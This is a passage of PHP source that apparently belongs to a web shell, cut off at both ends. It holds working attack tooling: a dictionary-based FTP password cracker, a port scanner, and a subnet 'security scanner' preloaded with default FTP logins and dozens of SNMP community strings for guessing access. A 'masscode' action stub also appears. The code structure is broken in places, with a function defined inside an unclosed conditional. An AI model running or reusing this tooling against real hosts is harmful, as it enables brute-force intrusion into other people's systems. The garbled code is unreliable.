}
$ftp = @ftp_connect($ip, 21, $timeout);
if ($ftp) {
if (@ftp_login($ftp, $user, $pass)) {
$output = 1;
echo "{$ip}) FTP FOUND: ({$user}:{$pass}) <a href=\"ftp://{$ip}\" target=\"_blank\">{$ip}</a> System type: " . ftp_systype($ftp) . "<br>";
}
}
flusheR();
}
}
}
if ($output) {
echo "<hr size=1 noshade>";
}
flusheR();
}
$time = time() - $start;
echo "Done! ({$time} seconds)</font>";
if (!empty($buglist)) {
unlink($buglist);
}
} else {
$chbox = extension_loaded('sockets') ? "<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">{$chbox}</td><td bgcolor=\"#808080\" align=\"right\">{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
$host = substr($host, 0, strrpos($host, "."));
echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH\$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
}
}
if ($act == "masscode") {
if (isset($_POST['dir']) && $_POST['dir'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['message']) && $_POST['message'] != '') {
function ftpcrackeR()
{
global $errorbox, $t, $et, $crack;
if (!function_exists("ftp_connect")) {
echo "{$errorbox} Server does n`t support FTP functions{$et}";
} else {
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
$target = $_REQUEST['target'];
$type = $_REQUEST['combo'];
$user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : "";
$dictionary = fopen($_REQUEST['dictionary'], 'r');
if ($dictionary) {
echo "<font color=blue>Cracking " . htmlspecialchars($target) . "...<br>";
while (!feof($dictionary)) {
if ($type) {
$combo = trim(fgets($dictionary), " \n\r");
$user = substr($combo, 0, strpos($combo, ':'));
$pass = substr($combo, strpos($combo, ':') + 1);
} else {
$pass = trim(fgets($dictionary), " \n\r");
}
if (!($ftp = ftp_connect($target, 21, 8))) {
echo "{$errorbox} Can not connect to server.{$et}";
break;
}
if (@ftp_login($ftp, $user, $pass)) {
echo "U: {$user} P: {$pass}<br>";
if (!$type) {
break;
}
}
ftp_close($ftp);
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
} else {
echo "{$errorbox} Can not open dictionary.{$et}";
}
} else {
echo "<center>{$t}FTP cracker:{$crack}";
}
}
}
